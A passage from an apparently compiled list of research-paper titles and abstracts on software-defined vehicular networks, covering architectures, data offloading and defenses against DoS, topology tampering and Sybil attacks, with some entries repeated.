use-cases for non-safety service (data streaming) and safety service (Lane-change assistance) are also presented to illustrate the benefits of our proposed architecture. --- paper_title: A Buffer-Aware QoS Streaming Approach for SDN-Enabled 5G Vehicular Networks paper_content: With the progress of network technology in recent years, multimedia streaming applications have become increasingly popular. However, it is difficult to achieve quality of service and efficiency for multimedia streaming over vehicular networks because of the high mobility feature. Over the existing network architecture, it is difficult to immediately analyze the status of the entire network, and then establish the rules of allocation and management. However, the novel network architecture, software-defined networking, offers other options for making network management more efficient, especially for the 5G network environment. Hence, a buffer-aware streaming approach is proposed to allow users to play multimedia streaming over vehicular 5G networks, in the case of handover between different eNodeBs, to achieve minimum delay and have better quality of service. According to the user's mobility information, the status of the player buffer, and the current strength of the network signal, the proposed approach can provide the transmission strategy of multimedia streaming to the SDN controller. Finally, the experimental results proved that the proposed approach is able to not only adjust the priority of streaming content segments with the buffer and mobility status of user equipment to effectively retain overall streaming services quality, but also avoid the delay of streaming content transmission for 5G vehicular networks. --- paper_title: FloodGuard: A DoS Attack Prevention Extension in Software-Defined Networks paper_content: This paper addresses one serious SDN-specific attack, i.e., data-to-control plane saturation attack, which overloads the infrastructure of SDN networks. In this attack, an attacker can produce a large amount of table-miss packet_in messages to consume resources in both control plane and data plane. To mitigate this security threat, we introduce an efficient, lightweight and protocol-independent defense framework for SDN networks. Our solution, called FloodGuard, contains two new techniques/modules: proactive flow rule analyzer and packet migration. To preserve network policy enforcement, proactive flow rule analyzer dynamically derives proactive flow rules by reasoning the runtime logic of the SDN/OpenFlow controller and its applications. To protect the controller from being overloaded, packet migration temporarily caches the flooding packets and submits them to the OpenFlow controller using rate limit and round-robin scheduling. We evaluate FloodGuard through a prototype implementation tested in both software and hardware environments. The results show that FloodGuard is effective with adding only minor overhead into the entire SDN/OpenFlow infrastructure. --- paper_title: 5G next generation VANETs using SDN and fog computing framework paper_content: The growth of technical revolution towards 5G Next generation networks is expected to meet various communication requirements of future Intelligent Transportation Systems (ITS). Motivated by the consumer needs for variety of ITS applications, bandwidth, high speed and ubiquity, researches are currently exploring different network architectures and techniques, which could be employed in Next generation ITS. To provide flexible network management, control and high resource utilization in Vehicular Ad-hoc Networks (VANETs) on large scale, a new hierarchical 5G Next generation VANET architecture is proposed. The key idea of this holistic architecture is to integrate the centralization and flexibility of Software Defined Networking (SDN) and Cloud-RAN (CRAN), with 5G communication technologies, to effectively allocate resources with a global view. Moreover, a fog computing framework (comprising of zones and clusters) has been proposed at the edge, to avoid frequent handovers between vehicles and RSUs. The transmission delay, throughput and control overhead on controller are analyzed and compared with other architectures. Simulation results indicate reduced transmission delay and minimized control overhead on controllers. Moreover, the throughput of proposed system is also improved. --- paper_title: An Architecture for Hierarchical Software-Defined Vehicular Networks paper_content: With the recent advances in the telecommunications and auto industries, we have witnessed growing interest in ITS, of which VANETs are an essential component. SDN can bring advantages to ITS through its ability to provide flexibility and programmability to networks through a logically centralized controller entity that has a comprehensive view of the network. However, as the SDN paradigm initially had fixed networks in mind, adapting it to work on VANETs requires some changes to address particular characteristics of this kind of scenario, such as the high mobility of its nodes. There has been initial work on bringing SDN concepts to vehicular networks to expand its abilities to provide applications and services through the increased flexibility, but most of these studies do not directly tackle the issue of loss of connectivity with said controller entity. In this article, we propose a hierarchical SDN-based vehicular architecture that aims to have improved performance in the situation of loss of connection with the central SDN controller. Simulation results show that our proposal outperforms traditional routing protocols in the scenario where there is no coordination from the central SDN controller. --- paper_title: Towards software-defined VANET: Architecture and services paper_content: Vehicular Ad Hoc Networks (VANETs) have in recent years been viewed as one of the enabling technologies to provide a wide variety of services, such as vehicle road safety, enhanced traffic and travel efficiency, and convenience and comfort for passengers and drivers. However, current VANET architectures lack in flexibility and make the deployment of services/protocols in large-scale a hard task. In this paper, we demonstrate how Software-Defined Networking (SDN), an emerging network paradigm, can be used to provide the flexibility and programmability to networks and introduces new services and features to today's VANETs. We take the concept of SDN, which has mainly been designed for wired infrastructures, especially in the data center space, and propose SDN-based VANET architecture and its operational mode to adapt SDN to VANET environments. We also discuss benefits of a Software-Defined VANET and the services that can be provided. We demonstrate in simulation the feasibility of a Software-Defined VANET by comparing SDN-based routing with traditional MANET/VANET routing protocols. We also show in simulation fallback mechanisms that must be provided to apply the SDN concept into mobile wireless scenarios, and demonstrate one of the possible services that can be provided by a Software-Defined VANET. --- paper_title: LineSwitch: Tackling Control Plane Saturation Attacks in Software-Defined Networking paper_content: Software defined networking (SDN) is a new networking paradigm that in recent years has revolutionized network architectures. At its core, SDN separates the data plane, which provides data forwarding functionalities, and the control plane, which implements the network control logic. The separation of these two components provides a virtually centralized point of control in the network, and at the same time abstracts the complexity of the underlying physical infrastructure. Unfortunately, while promising, the SDN approach also introduces new attacks and vulnerabilities. Indeed, previous research shows that, under certain traffic conditions, the required communication between the control and data plane can result in a bottleneck. An attacker can exploit this limitation to mount a new, network-wide, type of denial of service attack, known as the control plane saturation attack . This paper presents LineSwitch, an efficient and effective data plane solution to tackle the control plane saturation attack. LineSwitch employs probabilistic proxying and blacklisting of network traffic to prevent the attack from reaching the control plane, and thus preserve network functionality. We implemented LineSwitch as an extension of the reference SDN implementation, OpenFlow, and run a thorough set of experiments under different traffic and attack scenarios. We compared LineSwitch to the state of the art, and we show that it provides at the same time, the same level of protection against the control plane saturation attack, and a reduced time overhead by up to 30%. --- paper_title: SDVN: enabling rapid network innovation for heterogeneous vehicular communication paper_content: With the advances in telecommunications, more and more devices are connected to the Internet and getting smart. As a promising application scenario for carrier networks, vehicular communication has enabled many traffic-related applications. However, the heterogeneity of wireless infrastructures and the inflexibility in protocol deployment hinder the real world application of vehicular communications. SDN is promising to bridge the gaps through unified network abstraction and programmability. In this research, we propose an SDN-based architecture to enable rapid network innovation for vehicular communications. Under this architecture, heterogeneous wireless devices, including vehicles and roadside units, are abstracted as SDN switches with a unified interface. In addition, network resources such as bandwidth and spectrum can also be allocated and assigned by the logically centralized control plane, which provides a far more agile configuration capability. Besides, we also study several cases to highlight the advantages of the architecture, such as adaptive protocol deployment and multiple tenants isolation. Finally, the feasibility and effectiveness of the proposed architecture and cases are validated through traffic-trace-based simulation. --- paper_title: FlowRanger: A request prioritizing algorithm for controller DoS attacks in Software Defined Networks paper_content: Software Defined Networking (SDN) introduces a new communication network management paradigm and has gained much attention from academia and industry. However, the centralized nature of SDN is a potential vulnerability to the system since attackers may launch denial of services (DoS) attacks against the controller. Existing solutions limit requests rate to the controller by dropping overflowed requests, but they also drop legitimate requests to the controller. To address this problem, we propose FlowRanger, a buffer prioritizing solution for controllers to handle routing requests based on their likelihood to be attacking requests, which derives the trust values of the requesting sources. Based on their trust values, FlowRanger classifies routing requests into multiple buffer queues with different priorities. Thus, attacking requests are served with a lower priority than regular requests. Our simulation results demonstrates that FlowRanger can significantly enhance the request serving rate of regular users under DoS attacks against the controller. To the best of our knowledge, our work is the first solution to battle against controller DoS attacks on the controller side. --- paper_title: SDN VANETs in 5G: An architecture for resilient security services paper_content: Vehicular ad-Hoc Networks (VANETs) have been promoted as a key technology that can provide a wide variety of services such as traffic management, passenger safety, as well as travel convenience and comfort. VANETs are now proposed to be part of the upcoming Fifth Generation (5G) technology, integrated with Software Defined Networking (SDN), as key enabler of 5G. The technology of fog computing in 5G turned out to be an adequate solution for faster processing in delay sensitive application, such as VANETs, being a hybrid solution between fully centralized and fully distributed networks. In this paper, we propose a three-way integration between VANETs, SDN, and 5G for a resilient VANET security design approach, which strikes a good balance between network, mobility, performance and security features. We show how such an approach can secure VANETs from different types of attacks such as Distributed Denial of Service (DDoS) targeting either the controllers or the vehicles in the network, and how to trace back the source of the attack. Our evaluation shows the capability of the proposed system to enforce different levels of real-time user-defined security, while maintaining low overhead and minimal configuration. --- paper_title: Topology Discovery in Software Defined Networks: Threats, Taxonomy, and State-of-the-Art paper_content: The fundamental role of the software defined networks (SDNs) is to decouple the data plane from the control plane, thus providing a logically centralized visibility of the entire network to the controller. This enables the applications to innovate through network programmability. To establish a centralized visibility, a controller is required to discover a network topology of the entire SDN infrastructure. However, discovering a network topology is challenging due to: 1) the frequent migration of the virtual machines in the data centers; 2) lack of authentication mechanisms; 3) scarcity of the SDN standards; and 4) integration of security mechanisms for the topology discovery. To this end, in this paper, we present a comprehensive survey of the topology discovery and the associated security implications in SDNs. This survey provides discussions related to the possible threats relevant to each layer of the SDN architecture, highlights the role of the topology discovery in the traditional network and SDN, presents a thematic taxonomy of topology discovery in SDN, and provides insights into the potential threats to the topology discovery along with its state-of-the-art solutions in SDN. Finally, this survey also presents future challenges and research directions in the field of SDN topology discovery. --- paper_title: An Architecture for Hierarchical Software-Defined Vehicular Networks paper_content: With the recent advances in the telecommunications and auto industries, we have witnessed growing interest in ITS, of which VANETs are an essential component. SDN can bring advantages to ITS through its ability to provide flexibility and programmability to networks through a logically centralized controller entity that has a comprehensive view of the network. However, as the SDN paradigm initially had fixed networks in mind, adapting it to work on VANETs requires some changes to address particular characteristics of this kind of scenario, such as the high mobility of its nodes. There has been initial work on bringing SDN concepts to vehicular networks to expand its abilities to provide applications and services through the increased flexibility, but most of these studies do not directly tackle the issue of loss of connectivity with said controller entity. In this article, we propose a hierarchical SDN-based vehicular architecture that aims to have improved performance in the situation of loss of connection with the central SDN controller. Simulation results show that our proposal outperforms traditional routing protocols in the scenario where there is no coordination from the central SDN controller. --- paper_title: Towards software-defined VANET: Architecture and services paper_content: Vehicular Ad Hoc Networks (VANETs) have in recent years been viewed as one of the enabling technologies to provide a wide variety of services, such as vehicle road safety, enhanced traffic and travel efficiency, and convenience and comfort for passengers and drivers. However, current VANET architectures lack in flexibility and make the deployment of services/protocols in large-scale a hard task. In this paper, we demonstrate how Software-Defined Networking (SDN), an emerging network paradigm, can be used to provide the flexibility and programmability to networks and introduces new services and features to today's VANETs. We take the concept of SDN, which has mainly been designed for wired infrastructures, especially in the data center space, and propose SDN-based VANET architecture and its operational mode to adapt SDN to VANET environments. We also discuss benefits of a Software-Defined VANET and the services that can be provided. We demonstrate in simulation the feasibility of a Software-Defined VANET by comparing SDN-based routing with traditional MANET/VANET routing protocols. We also show in simulation fallback mechanisms that must be provided to apply the SDN concept into mobile wireless scenarios, and demonstrate one of the possible services that can be provided by a Software-Defined VANET. --- paper_title: Cost-Efficient Sensory Data Transmission in Heterogeneous Software-Defined Vehicular Networks paper_content: Sensing and networking have been regarded as key enabling technologies of future smart vehicles. Sensing allows vehicles to be context awareness, while networking empowers context sharing among ambients. Existing vehicular communication solutions mainly rely on homogeneous network, or heterogeneous network via data offloading. However, today’s vehicular network implementations are highly heterogeneous. Therefore, conventional homogeneous communication and data offloading may not be able to satisfy the requirement of the emerging vehicular networking applications. In this paper, we apply the software-defined network (SDN) to the heterogeneous vehicular networks to bridge the gaps. With SDN, heterogeneous network resources can be managed with a unified abstraction. Moreover, we propose an SDN-based wireless communication solution, which can schedule different network resources to minimize communication cost. We investigate the problems in both single and multiple hop cases. We also evaluate the proposed approaches using traffic traces. The effectiveness and the efficiency are validated by the results. --- paper_title: SDVN: enabling rapid network innovation for heterogeneous vehicular communication paper_content: With the advances in telecommunications, more and more devices are connected to the Internet and getting smart. As a promising application scenario for carrier networks, vehicular communication has enabled many traffic-related applications. However, the heterogeneity of wireless infrastructures and the inflexibility in protocol deployment hinder the real world application of vehicular communications. SDN is promising to bridge the gaps through unified network abstraction and programmability. In this research, we propose an SDN-based architecture to enable rapid network innovation for vehicular communications. Under this architecture, heterogeneous wireless devices, including vehicles and roadside units, are abstracted as SDN switches with a unified interface. In addition, network resources such as bandwidth and spectrum can also be allocated and assigned by the logically centralized control plane, which provides a far more agile configuration capability. Besides, we also study several cases to highlight the advantages of the architecture, such as adaptive protocol deployment and multiple tenants isolation. Finally, the feasibility and effectiveness of the proposed architecture and cases are validated through traffic-trace-based simulation. --- paper_title: Data Offloading in 5G-Enabled Software-Defined Vehicular Networks: A Stackelberg-Game-Based Approach paper_content: Data offloading using vehicles is one of the most challenging tasks to perform due to the high mobility of vehicles. There are many solutions available for this purpose, but due to the inefficient management of data along with the control decisions, these solutions are not adequate to provide data offloading by making use of the available networks. Moreover, with the advent of 5G and related technologies, there is a need to cope with high speed and traffic congestion in the existing infrastructure used for data offloading. Hence, to make intelligent decisions for data offloading, an SDN-based scheme is presented in this article. In the proposed scheme, an SDNbased controller is designed that makes decisions for data offloading by using the priority manager and load balancer. Using these two managers in SDN-based controllers, traffic routing is managed efficiently even with an increase in the size of the network. Moreover, a single-leader multi-follower Stackelberg game for network selection is also used for data offloading. The proposed scheme is evaluated with respect to several parameters where its performance was found to be superior in comparison to the existing schemes. --- paper_title: Multi-level SDN with vehicles as fog computing infrastructures: A new integrated architecture for 5G-VANETs paper_content: The spectacular emergence of connected and autonomous vehicles coupled with their evergrowing demands on processing, computation and communication resources pose new challenges to provide reliable vehicular services. Here, a combination of a multi-level SdN Approach and a foG computing architEcture based on Vehicles as Infrastructures paradigm, called VISAGE, is proposed for future 5G-VANET systems. By using vehicles as fog infrastructures and integrating them with local SDN controllers, the QoS of vehicular applications and protocols becomes more efficient in terms of computation time and communication delays. This is explained by offloading the computing services from the cloud to the edge of networks, making use of the abundant resources offered by vehicles and making network control decisions locally. Through three typical uses cases of our proposed 5G era vehicular architecture, we show the promising benefits of our approach in terms of communication and computation capacities. --- paper_title: Effective Topology Tampering Attacks and Defenses in Software-Defined Networks paper_content: As Software-Defined Networking has gained increasing prominence, new attacks have been demonstrated which can corrupt the SDN controller's view of network topology. These topology poisoning attacks, most notably host-location hijacking and link fabrication attacks, enable adversaries to impersonate end-hosts or inter-switch links in order to monitor, corrupt, or drop network flows. In response, defenses have been developed to detect such attacks and raise an alert. In this paper, we analyze two such defenses, TopoGuard and Sphinx, and present two new attacks, Port Probing and Port Amnesia, that can successfully bypass them. We then develop and present extensions to TopoGuard to make it resilient to such attacks. --- paper_title: SPHINX: Detecting Security Attacks in Software-Defined Networks. paper_content: Software-defined networks (SDNs) allow greater control over network entities by centralizing the control plane, but place great burden on the administrator to manually ensure security and correct functioning of the entire network. We list several attacks on SDN controllers that violate network topology and data plane forwarding, and can be mounted by compromised network entities, such as end hosts and soft switches. We further demonstrate their feasibility on four popular SDN controllers. We propose SPHINX to detect both known and potentially unknown attacks on network topology and data plane forwarding originating within an SDN. SPHINX leverages the novel abstraction of flow graphs, which closely approximate the actual network operations, to enable incremental validation of all network updates and constraints. SPHINX dynamically learns new network behavior and raises alerts when it detects suspicious changes to existing network control plane behavior. Our evaluation shows that SPHINX is capable of detecting attacks in SDNs in realtime with low performance overheads, and requires no changes to the controllers for deployment. --- paper_title: FloodGuard: A DoS Attack Prevention Extension in Software-Defined Networks paper_content: This paper addresses one serious SDN-specific attack, i.e., data-to-control plane saturation attack, which overloads the infrastructure of SDN networks. In this attack, an attacker can produce a large amount of table-miss packet_in messages to consume resources in both control plane and data plane. To mitigate this security threat, we introduce an efficient, lightweight and protocol-independent defense framework for SDN networks. Our solution, called FloodGuard, contains two new techniques/modules: proactive flow rule analyzer and packet migration. To preserve network policy enforcement, proactive flow rule analyzer dynamically derives proactive flow rules by reasoning the runtime logic of the SDN/OpenFlow controller and its applications. To protect the controller from being overloaded, packet migration temporarily caches the flooding packets and submits them to the OpenFlow controller using rate limit and round-robin scheduling. We evaluate FloodGuard through a prototype implementation tested in both software and hardware environments. The results show that FloodGuard is effective with adding only minor overhead into the entire SDN/OpenFlow infrastructure. --- paper_title: Distributed denial of service attacks in software-defined networking with cloud computing paper_content: Although software-defined networking (SDN) brings numerous benefits by decoupling the control plane from the data plane, there is a contradictory relationship between SDN and distributed denial-of-service (DDoS) attacks. On one hand, the capabilities of SDN make it easy to detect and to react to DDoS attacks. On the other hand, the separation of the control plane from the data plane of SDN introduces new attacks. Consequently, SDN itself may be a target of DDoS attacks. In this paper, we first discuss the new trends and characteristics of DDoS attacks in cloud computing environments. We show that SDN brings us a new chance to defeat DDoS attacks in cloud computing environments, and we summarize good features of SDN in defeating DDoS attacks. Then we review the studies about launching DDoS attacks on SDN and the methods against DDoS attacks in SDN. In addition, we discuss a number of challenges that need to be addressed to mitigate DDoS attached in SDN with cloud computing. This work can help understand how to make full use of SDN's advantages to defeat DDoS attacks in cloud computing environments and how to prevent SDN itself from becoming a victim of DDoS attacks. --- paper_title: FRESCO: Modular Composable Security Services for SoftwareDefined Networks paper_content: OpenFlow is an open standard that has gained tremendous interest in the last few years within the network community. It is an embodiment of the software-defined networking paradigm, in which higher-level flow routing decisions are derived from a control layer that, unlike classic network switch implementations, is separated from the data handling layer. The central attraction to this paradigm is that by decoupling the control logic from the closed and proprietary implementations of traditional network switch infrastructure, researchers can more easily design and distribute innovative flow handling and network control algorithms. Indeed, we also believe that OpenFlow can, in time, prove to be one of the more impactful technologies to drive a variety of innovations in network security. OpenFlow could offer a dramatic simplification to the way we design and integrate complex network security applications into large networks. However, to date there remains a stark paucity of compelling OpenFlow security applications. In this paper, we introduce FRESCO, an OpenFlow security application development framework designed to facilitate the rapid design, and modular composition of OF-enabled detection and mitigation modules. FRESCO, which is itself an OpenFlow application, offers a Click-inspired [19] programming framework that enables security researchers to implement, share, and compose together, many different security detection and mitigation modules. We demonstrate the utility of FRESCO through the implementation of several well-known security defenses as OpenFlow security services, and use them to examine various performance and efficiency aspects of our proposed framework. --- paper_title: Towards software-defined VANET: Architecture and services paper_content: Vehicular Ad Hoc Networks (VANETs) have in recent years been viewed as one of the enabling technologies to provide a wide variety of services, such as vehicle road safety, enhanced traffic and travel efficiency, and convenience and comfort for passengers and drivers. However, current VANET architectures lack in flexibility and make the deployment of services/protocols in large-scale a hard task. In this paper, we demonstrate how Software-Defined Networking (SDN), an emerging network paradigm, can be used to provide the flexibility and programmability to networks and introduces new services and features to today's VANETs. We take the concept of SDN, which has mainly been designed for wired infrastructures, especially in the data center space, and propose SDN-based VANET architecture and its operational mode to adapt SDN to VANET environments. We also discuss benefits of a Software-Defined VANET and the services that can be provided. We demonstrate in simulation the feasibility of a Software-Defined VANET by comparing SDN-based routing with traditional MANET/VANET routing protocols. We also show in simulation fallback mechanisms that must be provided to apply the SDN concept into mobile wireless scenarios, and demonstrate one of the possible services that can be provided by a Software-Defined VANET. --- paper_title: Cost-Efficient Sensory Data Transmission in Heterogeneous Software-Defined Vehicular Networks paper_content: Sensing and networking have been regarded as key enabling technologies of future smart vehicles. Sensing allows vehicles to be context awareness, while networking empowers context sharing among ambients. Existing vehicular communication solutions mainly rely on homogeneous network, or heterogeneous network via data offloading. However, today’s vehicular network implementations are highly heterogeneous. Therefore, conventional homogeneous communication and data offloading may not be able to satisfy the requirement of the emerging vehicular networking applications. In this paper, we apply the software-defined network (SDN) to the heterogeneous vehicular networks to bridge the gaps. With SDN, heterogeneous network resources can be managed with a unified abstraction. Moreover, we propose an SDN-based wireless communication solution, which can schedule different network resources to minimize communication cost. We investigate the problems in both single and multiple hop cases. We also evaluate the proposed approaches using traffic traces. The effectiveness and the efficiency are validated by the results. --- paper_title: Data Offloading in 5G-Enabled Software-Defined Vehicular Networks: A Stackelberg-Game-Based Approach paper_content: Data offloading using vehicles is one of the most challenging tasks to perform due to the high mobility of vehicles. There are many solutions available for this purpose, but due to the inefficient management of data along with the control decisions, these solutions are not adequate to provide data offloading by making use of the available networks. Moreover, with the advent of 5G and related technologies, there is a need to cope with high speed and traffic congestion in the existing infrastructure used for data offloading. Hence, to make intelligent decisions for data offloading, an SDN-based scheme is presented in this article. In the proposed scheme, an SDNbased controller is designed that makes decisions for data offloading by using the priority manager and load balancer. Using these two managers in SDN-based controllers, traffic routing is managed efficiently even with an increase in the size of the network. Moreover, a single-leader multi-follower Stackelberg game for network selection is also used for data offloading. The proposed scheme is evaluated with respect to several parameters where its performance was found to be superior in comparison to the existing schemes. --- paper_title: A Scalable and Quick-Response Software Defined Vehicular Network Assisted by Mobile Edge Computing paper_content: Connected vehicles provide advanced transformations and attractive business opportunities in the automotive industry. Presently, IEEE 802.11p and evolving 5G are the mainstream radio access technologies in the vehicular industry, but neither of them can meet all requirements of vehicle communication. In order to provide low-latency and high-reliability communication, an SDN-enabled network architecture assisted by MEC, which integrates different types of access technologies, is proposed. MEC technology with its on-premises feature can decrease data transmission time and enhance quality of user experience in latency-sensitive applications. Therefore, MEC plays as important a role in the proposed architecture as SDN technology. The proposed architecture was validated by a practical use case, and the obtained results have shown that it meets application- specific requirements and maintains good scalability and responsiveness. --- paper_title: A security enforcement kernel for OpenFlow networks paper_content: Software-defined networks facilitate rapid and open innovation at the network control layer by providing a programmable network infrastructure for computing flow policies on demand. However, the dynamism of programmable networks also introduces new security challenges that demand innovative solutions. A critical challenge is efficient detection and reconciliation of potentially conflicting flow rules imposed by dynamic OpenFlow (OF) applications. To that end, we introduce FortNOX, a software extension that provides role-based authorization and security constraint enforcement for the NOX OpenFlow controller. FortNOX enables NOX to check flow rule contradictions in real time, and implements a novel analysis algorithm that is robust even in cases where an adversarial OF application attempts to strategically insert flow rules that would otherwise circumvent flow rules imposed by OF security applications. We demonstrate the utility of FortNOX through a prototype implementation and use it to examine performance and efficiency aspects of the proposed framework. --- paper_title: A Location Privacy Preserving Authentication Scheme in Vehicular Networks paper_content: As an emerging application scenario of wireless technologies, vehicular communications have been initiated not only for enhancing the transportation safety and driving experiences, but also for a new commercial market of on-board Internet services. Due to extraordinarily high mobility of vehicles in a vehicular network, frequent handover requests will be a norm, which initiates the demand for an effective and fast authentication scheme that can maintain the service continuity in presence of the frequent handover events. However, previously reported authentication schemes, although with minimized handover latency and packet loss rate, may disclose the location information of the mobile user to the third party, which will seriously violate the location privacy of the user. In this paper, we propose a location privacy preserving authentication scheme based on blind signature in the elliptic curve domain. The scheme cannot only provide fast authentication, but also guarantee the security and location anonymity to the public. To analyze the proposed scheme, a theoretical traceability analysis is conducted, which shows that the probability of tracing an vehicle's route is negligibly small. We will also examine the authentication speed of the scheme, and show that the scheme can satisfy seamless handover for fast moving vehicles. --- paper_title: GSIS: A Secure and Privacy-Preserving Protocol for Vehicular Communications paper_content: In this paper, we first identify some unique design requirements in the aspects of security and privacy preservation for communications between different communication devices in vehicular ad hoc networks. We then propose a secure and privacy-preserving protocol based on group signature and identity (ID)-based signature techniques. We demonstrate that the proposed protocol cannot only guarantee the requirements of security and privacy but can also provide the desired traceability of each vehicle in the case where the ID of the message sender has to be revealed by the authority for any dispute event. Extensive simulation is conducted to verify the efficiency, effectiveness, and applicability of the proposed protocol in various application scenarios under different road systems. --- paper_title: An Efficient Identity-Based Conditional Privacy-Preserving Authentication Scheme for Vehicular Ad Hoc Networks paper_content: By broadcasting messages about traffic status to vehicles wirelessly, a vehicular ad hoc network (VANET) can improve traffic safety and efficiency. To guarantee secure communication in VANETs, security and privacy issues must be addressed before their deployment. The conditional privacy-preserving authentication (CPPA) scheme is suitable for solving security and privacy-preserving problems in VANETs, because it supports both mutual authentication and privacy protection simultaneously. Many identity-based CPPA schemes for VANETs using bilinear pairings have been proposed over the last few years to enhance security or to improve performance. However, it is well known that the bilinear pairing operation is one of the most complex operations in modern cryptography. To achieve better performance and reduce computational complexity of information processing in VANET, the design of a CPPA scheme for the VANET environment that does not use bilinear paring becomes a challenge. To address this challenge, we propose a CPPA scheme for VANETs that does not use bilinear paring and we demonstrate that it could supports both the mutual authentication and the privacy protection simultaneously. Our proposed CPPA scheme retains most of the benefits obtained with the previously proposed CPPA schemes. Moreover, the proposed CPPA scheme yields a better performance in terms of computation cost and communication cost making it be suitable for use by the VANET safety-related applications. --- paper_title: Fast and Secure Multihop Broadcast Solutions for Intervehicular Communication paper_content: Intervehicular communication (IVC) is an important emerging research area that is expected to considerably contribute to traffic safety and efficiency. In this context, many possible IVC applications share the common need for fast multihop message propagation, including information such as position, direction, and speed. However, it is crucial for such a data exchange system to be resilient to security attacks. Conversely, a malicious vehicle might inject incorrect information into the intervehicle wireless links, leading to life and money losses or to any other sort of adversarial selfishness (e.g., traffic redirection for the adversarial benefit). In this paper, we analyze attacks to the state-of-the-art IVC-based safety applications. Furthermore, this analysis leads us to design a fast and secure multihop broadcast algorithm for vehicular communication, which is proved to be resilient to the aforementioned attacks. --- paper_title: Towards resilient geographic routing in WSNs paper_content: In this paper, we consider the security of geographical forwarding (GF) -- a class of algorithms widely used in ad hoc and sensor networks. In GF, neighbors exchange their location information, and a node forwards packets to the destination by picking a neighbor that moves the packet closer to the destination. There are a number of attacks that are possible on geographic forwarding. One of the attacks is predicated on misbehaving nodes falsifying their location information. The first contribution of the paper is to propose a location verification algorithm that addresses this problem. The second contribution of the paper is to propose approaches for route authentication and trust-based route selection to defeat attacks on the network. We discuss the proposed approaches in detail, outlining possible attacks and defenses against them. --- paper_title: The impact of malicious nodes positioning on vehicular alert messaging system paper_content: ICT components of vehicular and transportation systems have a crucial role in ensuring passengers' safety, particularly in the scenario of vehicular networks. Hence, security concerns should not be overlooked, since a malicious vehicle might inject false information into the intervehicle wireless links, leading to life and money losses. This is even more critical when considering applications specifically aimed at improving people's safety, such as accident warning systems. To assess the scenario of such type of applications in a vehicular network, we have performed a thorough evaluation of accident warning systems under a position cheating attack. As one of the main contributions of this paper, we determine the impact of a different number of malicious vehicles on delaying the alert warning messages. In particular, we study the impact of the position of malicious vehicles on delaying alert messages. We identify the most effective strategies that could be used by malicious vehicles in order to maximize the delay of the alert message, and thus strengthen the impact of the attacker. Finally, we pinpoint that even with a small number of malicious vehicles, the positioning cheating attack can significantly increase the delay of the alert message when compared to a scenario without attack. --- paper_title: Improved security in geographic ad hoc routing through autonomous position verification paper_content: Inter-vehicle communication is regarded as one of the major applications of mobile ad hoc networks (MANETs). Compared to other MANETs, these so called vehicular ad hoc networks (VANETs) have special requirements in terms of node mobility and position-dependent applications, which are well met by geographic routing protocols. Functional research on geographic routing has already reached a considerable level, whereas security aspects have been vastly neglected so far. Since position dissemination is crucial for geographic routing, forged position information has severe impact regarding both performance and security.In order to lessen this problem, we propose a detection mechanism that is capable of recognizing nodes cheating about their position in beacons (periodic position dissemination in most single-path geographic routing protocols, e.g. GPSR). Unlike other proposals described in the literature, our detection does not rely on additional hardware or special nodes, which contradicts the ad hoc approach. Instead, this mechanism uses a number of different independent sensors to quickly give an estimation of the trustworthiness of other nodes' position claims without using dedicated infrastructure or specialized hardware.The simulative evaluation proves that our position verification system successfully discloses nodes disseminating false positions and thereby widely prevents attacks using position cheating. --- paper_title: AWF-NA: A Complete Solution for Tampered Packet Detection in VANETs paper_content: In vehicular ad hoc networks (VANETs), it is vital to ensure that tampered data packets, especially safety-related ones, are detected and stopped from further propagation. To this end, we propose a novel scheme, autonomous watchdog formation enabled by 2-hop neighborhood awareness (AWF-NA), to ensure nodes automatically functioning as watchdogs to monitor the behaviors of the relaying nodes. Unlike existing schemes [1-4], it aims to detect and react at each hop, and stop any tampered packet from further propagation in spite of dishonest watchdogs and relaying nodes. At each hop, the neighbors of the relaying node and the receiver node autonomously select eligible watchdogs among themselves based on local information provided by 2-hop neighborhood awareness. With 2-hop neighborhood awareness each node knows all the neighbors within its 2 hops, which provides it with necessary information to act according to the heuristic rules in AWF-NA. Induction-based proof shows that AWF-NA can detect all potential attacks of data packet tampering. Theoretical analysis indicates that it achieves good balance of desirable performance and authentic packet relaying. --- paper_title: An efficient service channel allocation scheme in SDN-enabled VANETs paper_content: Providing infotainment services in Vehicular Adhoc Networks (VANETs) is a key functionality for the future intelligent transportation systems. However, the unique features of vehicular networks such as high velocity, intermittent communication links and dynamic density can induce severe performances degradation for infotainment services running on the six Service Channels (SCHs) available in the Dedicated Short Range Communication (DSRC). Although, the Wireless Access in the Vehicular Environment (WAVE) has been proposed for VANETs to support these applications and guarantee the QoS by proposing four different access categories, no service channel scheme has been proposed to ensure fair and interference-aware allocation. To fill this gap, in this work we propose ESCiVA, an Efficient Service Channel allocation Scheme in SDN-enabled VAnets to balance service traffic on the six SCHs and mitigate interferences between services provided on adjacent channels. Extensive simulation results confirm that ESCiVA outperforms the basic SCH allocation method, defined in the WAVE standard. --- paper_title: Detection and localization of sybil nodes in VANETs paper_content: Sybil attacks have been regarded as a serious security threat to ad hoc networks and sensor networks. They may also impair the potential applications of VANETs (Vehicular Ad hoc Networks) by creating an illusion of traffic congestion. In this paper, we present a lightweight security scheme for detecting and localizing Sybil nodes in VANETs, based on statistic analysis of signal strength distribution. Our scheme is a distributed and localized approach, in which each vehicle on a road can perform the detection of potential Sybil vehicles nearby by verifying their claimed positions. We first introduce a basic signal-strength-based position verification scheme. However, the basic scheme proves to be inaccurate and vulnerable to spoof attacks. In order to compensate for the weaknesses of the basic scheme, we propose a technique to prevent Sybil nodes from covering up for each other. In this technique, traffic patterns and support from roadside base stations are used to our advantage. We, then, propose two statistic algorithms to enhance the accuracy of position verification. The algorithms can detect potential Sybil attacks by observing the signal strength distribution of a suspect node over a period of time. The statistic nature of our algorithms significantly reduces the verification error rate. Finally, we conduct simulations to explore the feasibility of our scheme. --- paper_title: A Robust Detection of the Sybil Attack in Urban VANETs paper_content: The Sybil attack is one of the serious attacks to Vehicular Ad Hoc Networks (VANETs), because it severely damages the security of VANETs and, even leads to a threat to lives of drivers and passengers. In this paper, we propose a solution to detect the Sybil attack based on the differences between the normal motion trajectories of vehicles and the abnormal ones. In our approach, each node can accomplish the attack detection independently with the limited assistance from the infrastructures of VANETs. We improve the feasibility of our approach with limited infrastructures at the early deployment stages of VANETs. In addition, the independency and feasibility of our algorithm are more robust than the existing solutions that rely on collaboration of neighboring nodes. Simulation results show that the proposed method outperforms the existing solutions in terms of robustness, detection rate, overhead efficiency, and lower system requirements. --- paper_title: A sybil attack detection approach using neighboring vehicles in VANET paper_content: Vehicular Ad Hoc Network (VANET) is vulnerable to many security threats. One severe attack is Sybil attack, in which a malicious node forges a large number of fake identities in order to disrupt the proper functioning of VANET applications. In this paper, a distributed and 